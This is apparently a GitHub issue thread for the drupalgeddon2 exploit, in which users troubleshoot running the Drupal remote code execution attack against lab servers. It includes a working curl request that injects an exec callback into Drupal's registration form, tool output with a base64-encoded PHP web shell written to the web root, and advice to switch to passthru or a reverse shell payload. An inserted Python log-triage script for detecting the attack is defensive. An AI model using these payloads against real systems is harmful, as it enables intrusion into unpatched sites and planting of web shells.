Comments (17)

jirojo2 commented on August 18, 2024

Hello,

Please check the Drupal logs.

The first request of the exploit returns the expected response, so I guess the base64 binary is missing from your RHEL7 installation.

In the log you might see something like:

1.sh: base64 command not found

from drupalgeddon2.

stinkefisch commented on August 18, 2024

Thanks for the reply

```
ruby new.rb http://192.168.0.208
[*] --==[::#Drupalggedon2::]==--

[+] Target seems to be exploitable! w00hooOO!
[+] PHP shell: http://192.168.0.208/s.php?c=CMD
[+] Type your commands (exit to exit) and press Enter!
Drupalgeddon2-> id

<title>Page not found | Drupal Site</title>
<link rel="stylesheet" href="/sites/default/files/css/css_2ud1l8AYT-mA2srFCxTDcpG9V5EgtOQkSNUVPaX_2iQ.css?0" media="all" />
```

[root@drupal2 log]# whereis base64
base64: /usr/bin/base64 /usr/share/man/man1/base64.1.gz

Base64 exists on target.

Log says
192.168.0.200 - - [15/Apr/2018:12:28:55 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 156 "-" "Ruby"
192.168.0.200 - - [15/Apr/2018:12:29:00 +0000] "GET /s.php?c=id HTTP/1.1" 404 8089 "-" "Ruby"

from drupalgeddon2.
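A defender reviewing the same access log can key on the two entries quoted above: a POST whose `element_parents` parameter decodes to a `#`-prefixed key, followed by a parameterised request for a non-core `.php` script from the same client. The following log triage is an added example, not part of the thread or of the drupalgeddon2 project; the function names and the `CORE_SCRIPTS` allow-list are assumptions, and the last two sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Assumption: front controllers that ship with Drupal; tune this set per site.
CORE_SCRIPTS = {"/index.php", "/update.php", "/cron.php", "/core/install.php"}

def is_render_array_probe(method, target):
    """True for a POST to an AJAX form whose element_parents names a '#' key."""
    query = parse_qs(urlsplit(target).query)  # decodes %23value to '#value'
    return (method == "POST"
            and query.get("ajax_form") == ["1"]
            and any("#" in p for p in query.get("element_parents", [])))

def triage(lines):
    """Return (ip, timestamp, finding) tuples in log order."""
    probed, findings = set(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, url, status = m["ip"], urlsplit(m["target"]), m["status"]
        if is_render_array_probe(m["method"], m["target"]):
            probed.add(ip)
            findings.append((ip, m["ts"], "render-array probe, status " + status))
        elif (ip in probed and url.path.endswith(".php") and url.query
              and url.path not in CORE_SCRIPTS):
            # Same client now requests a non-core script with parameters.
            verdict = {"200": "script answered", "404": "script absent"}.get(
                status, "status " + status)
            findings.append((ip, m["ts"], f"follow-up {url.path}: {verdict}"))
    return findings

SAMPLE_LOG = [
    # First two entries are the lines quoted in the thread.
    '192.168.0.200 - - [15/Apr/2018:12:28:55 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 156 "-" "Ruby"',
    '192.168.0.200 - - [15/Apr/2018:12:29:00 +0000] "GET /s.php?c=id HTTP/1.1" 404 8089 "-" "Ruby"',
    # Constructed entries: ordinary traffic that must not be flagged.
    '192.168.0.200 - - [15/Apr/2018:12:29:30 +0000] "GET /index.php?q=user HTTP/1.1" 200 7310 "-" "Ruby"',
    '192.168.0.50 - - [15/Apr/2018:12:30:10 +0000] "POST /user/register HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(*finding, sep=" | ")
```

A 200 on the probe only shows the AJAX endpoint answered; the follow-up status is what separates a failed write, as in this thread, from a script that is now being served.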

dreadlocked commented on August 18, 2024

Maybe some write permissions issue? Remember that you can just execute a command without needing to write a shell to disk. Change exec -> passthru; you should receive the command output in the data field. Another solution: just specify a reverse shell command in the payload and receive a reverse shell without writing to disk.

from drupalgeddon2.

paddibr commented on August 18, 2024

Is it possible to work with the chmod command?

from drupalgeddon2.

stinkefisch commented on August 18, 2024

It's just not working

curl --data 'form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=phpinfo()' 'http://192.168.0.208/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'

[{"command":"insert","method":"replaceWith","selector":null,"data":"\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C/span\u003E","settings":null}]r

BTW I followed this guide to set up the application (selinux and firewalld off) on ESXi 6.5.
https://www.tecmint.com/install-drupal-in-centos-rhel-fedora/

from drupalgeddon2.

g0tmi1k commented on August 18, 2024

Once #13 is merged in, please could you retest?


Edit: Merged. Can you try now?

from drupalgeddon2.

adampankow commented on August 18, 2024

@g0tmi1k I'm having the same issue myself. The call to /?q=user/password succeeds for obtaining the form_build_id but then the next call to /file/ajax... fails with a 404 error. Does /file/ajax maybe require some Drupal option or module installed for it to be accessible?

from drupalgeddon2.

g0tmi1k commented on August 18, 2024

It's working for me out of the box for v7.55 and v7.57.
I've just done a fresh install, and nothing more.

I've heard/seen stuff on Twitter that it's common for things to be disabled/altered for v7.

from drupalgeddon2.

adampankow commented on August 18, 2024

@stinkefisch #14 likely has a fix for your issue

from drupalgeddon2.

adampankow commented on August 18, 2024

I believe the root cause was an issue with Clean URLs not being enabled in Drupal. Details here: https://www.drupal.org/node/15365

from drupalgeddon2.

dbjpanda commented on August 18, 2024

I am getting this error when I tested it for D8. But I can see the PHP file s.php is already there inside my Drupal dir. Also, I did a chmod 777 s.php but get the same error: page not found.

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.4.6 (Ubuntu)</center>
</body>
</html>

from drupalgeddon2.

stinkefisch commented on August 18, 2024

Thanks for the reply.

```
[*] --==[::#Drupalggedon2::]==--

[*] Target : http://192.168.0.209/

[!] MISSING: http://192.168.0.209/CHANGELOG.txt (404)
[+] Found : http://192.168.0.209/core/CHANGELOG.txt (200)
[+] Drupal!: 8.4.5

[*] Testing: Code Execution
[*] Payload: echo MJOEPXUN
[+] Result :
[+] Target might to be exploitable?

[*] Testing: File Write To Web Root (./)
[*] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee ./s.php
[+] Result :
[!] Target is NOT exploitable. No write access here!
[*] Testing: File Write To Web Root (./sites/default/)
[*] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee ./sites/default/s.php
[+] Result :
[!] Target is NOT exploitable. No write access here!
[*] Testing: File Write To Web Root (./sites/default/files/)
[*] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee ./sites/default/files/s.php
[+] Result :
[!] Target is NOT exploitable. No write access here!

[!] FAILED: Coudn't find writeable web path
[*] Dropping back direct commands (expect an ugly shell!)
```

That's a bit weird, 'cause as a test I did a chmod -R 777 on /var/www/html and still get this issue.
Odd

SELinux status: disabled

from drupalgeddon2.

g0tmi1k commented on August 18, 2024

@stinkefisch
Does the target have base64 installed?
If so, what's the output of base64 -h?
If the package is missing, that would explain it.
If the package is there, I wonder if the flag is -D for you and not -d as it is currently.


@dbjpanda New issue, new post.
Please don't hijack someone else's.


@adampankow
Thanks for the heads up, will test

from drupalgeddon2.

stinkefisch commented on August 18, 2024

@g0tmi1k
It is the app exploit works well in the wild.
I'll have another play with my app.
Thanks for the support.

from drupalgeddon2.

g0tmi1k commented on August 18, 2024

@stinkefisch
I'm sorry, I don't understand what you are saying.
Could you re-word your last statement?

from drupalgeddon2.

stinkefisch commented on August 18, 2024

I meant it is the Drupal app itself locally.
I'll check another Drupal install doc and retest it.
Thanks

from drupalgeddon2.

g0tmi1k commented on August 18, 2024

Feel free to re-open when you have re-tested (and there is still an issue!)

from drupalgeddon2.
